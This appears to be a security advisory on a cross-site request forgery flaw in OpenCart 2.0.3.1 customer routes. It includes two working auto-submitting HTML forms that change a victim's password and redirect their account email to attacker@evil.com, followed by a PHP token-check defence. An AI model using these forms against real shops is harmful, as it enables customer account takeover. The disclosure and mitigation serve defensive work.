Vulnerability not resolved since 2013
What is OpenCart
OpenCart is a turn-key ready “out of the box” shopping cart solution. You simply install, select your template, add products and you’re ready to start accepting orders. It has order management and multiple payment gateways already built in and we provide lifetime free support and free software updates. Open Source.
OpenCart 2.0.3.1 has been found to be vulnerable to cross-site request forgery (CSRF). While CSRF protection exists for admin actions, it does not exist for customer actions. This means that a customer account can be compromised by an attacker if the victim visits an attacker-controlled website while logged in.
Proof that it works
Change Password
<form name="myform" method="post" action="http://localhost/opencart-2.0.3.1/upload/index.php?route=account/password">
  <input type="hidden" name="password" value="12345">
  <input type="hidden" name="confirm" value="12345">
</form>
<script>document.myform.submit();</script>
Change Profile Information
<form name="myform" method="post" action="http://localhost/opencart-2.0.3.1/upload/index.php?route=account/edit">
  <input type="hidden" name="currency" value="USD">
  <input type="hidden" name="language" value="en">
  <input type="hidden" name="firstname" value="Jane">
  <input type="hidden" name="lastname" value="Smith">
  <input type="hidden" name="email" value="attacker@evil.com">
  <input type="hidden" name="telephone" value="1234567">
</form>
<script>document.myform.submit();</script>
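Both requests above are accepted because every field they carry can be supplied by a third-party page. As an added example (not OpenCart's code and not part of the original advisory), the following PHP shows a synchronizer-token check for customer POST routes; the function names, the csrf_token field and the array standing in for $_SESSION are assumptions.

```php
<?php
// Added example: synchronizer-token check for customer POST routes.
// Function names and the 'csrf_token' field are hypothetical, not OpenCart's.

// Issue (or reuse) a per-session token; embed it in every customer form.
function csrf_issue(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing request only if it echoes the session's token.
function csrf_verify(array $session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false; // password/profile changes must never be accepted over GET
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($supplied) || $expected === '' || $supplied === '') {
        return false;
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Constructed sample requests (not captured traffic).
$session = [];                       // stands in for $_SESSION
$token   = csrf_issue($session);

// 1. The cross-site password form from this page: fields only, no token.
$forged = ['password' => '12345', 'confirm' => '12345'];
// 2. The same change submitted from the site's own form, token included.
$legit  = $forged + ['csrf_token' => $token];
// 3. A request carrying a token that was not issued to this session.
$guess  = $forged + ['csrf_token' => str_repeat('0', 64)];

foreach (['forged' => $forged, 'legit' => $legit, 'guess' => $guess] as $name => $post) {
    $ok = csrf_verify($session, 'POST', $post);
    printf("%-6s => %s\n", $name, $ok ? 'accepted' : 'rejected (403)');
}
```

Setting SameSite=Lax or Strict on the session cookie is a complementary control, since the browser then withholds the cookie from cross-site POSTs.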